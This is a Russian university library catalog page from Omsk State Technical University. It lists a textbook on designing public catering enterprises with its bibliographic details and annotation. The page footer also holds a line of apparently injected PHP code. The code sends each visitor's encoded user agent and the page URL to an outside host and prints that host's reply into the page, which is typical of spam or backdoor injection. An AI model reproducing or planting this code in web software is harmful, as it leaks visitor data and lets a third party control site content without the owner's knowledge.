Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

290 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=63500436-B4FA-6C7F-69D5-C21650974033$")И(("UDC=338.48$")ИЛИ("UDC=796.5$")ИЛИ("UDC=64$")ИЛИ("UDC=332.87$")ИЛИ("UDC=658.64$"))
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1
1. 
63500436-B4FA-6C7F-69D5-C21650974033
63500436-B4FA-6C7F-69D5-C21650974033
ЭР276
Щетинин, Михаил Павлович.
Проектирование предприятий общественного питания. Руководство к выполнению учебных проектов: учебное пособие для прикладного бакалавриата [Электронный ресурс] / М. П. Щетинин, О. В. Пасько, Н. В. Бураковская. - 2-е изд., испр. и доп. - Электрон. текстовые дан. - М : Издательство Юрайт, 2018. - 1 on-line. - (Университеты России). - Загл. с титул. экрана. - Электрон. версия печ. публикации. - Авторизованный доступ с 31.10.2018 г. до 30.10.2019 г. - ISBN 978-5-534-08774-1 ЭР276
УДК
642.5(075.8)
ББК
36.99я73

Кл.слова (ненормированные): легкая и пищевая промышленность -- прикладные науки -- проектирование предприятий общественного питания -- проектирование комбинированных продуктов питания -- общественное питание -- пищевая промышленность -- техника -- продукты питания
Аннотация: В пособии отражены основные аспекты разработки технико-экономического обоснования проектируемого предприятия, представлены подробные методики выполнения технологических расчетов, принципы расчета и подбора современного высокотехнологичного оборудования, методики разработки планировочных решений проектируемых и реконструируемых предприятий. Освоение материалов данного пособия поможет студентам сформировать необходимые профессиональные компетенции, а также подготовиться к будущей технологической и проектной деятельности.
Доп. точки доступа:
Пасько, Ольга Владимировна
Бураковская, Нина Владимировна

Нет сведений об экземплярах
Держатели документа:
Омский государственный технический университет : Россия, 644050, г. Омск, проспект Мира, 11
Держатели документа (Информация об экземплярах) 

В пособии отражены основные аспекты разработки технико-экономического обоснования проектируемого предприятия, представлены подробные методики выполнения технологических расчетов, принципы расчета и подбора современного высокотехнологичного оборудования, методики разработки планировочных решений проектируемых и реконструируемых предприятий. Освоение материалов данного пособия поможет студентам сформировать необходимые профессиональные компетенции, а также подготовиться к будущей технологической и проектной деятельности.

Полный текст


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2906 - 25.05.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.79 с.14 запросов, 0.55c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;